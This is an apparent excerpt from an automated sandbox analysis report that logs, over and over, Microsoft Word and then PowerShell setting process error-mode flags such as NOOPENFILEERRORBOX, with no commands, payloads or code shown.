Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
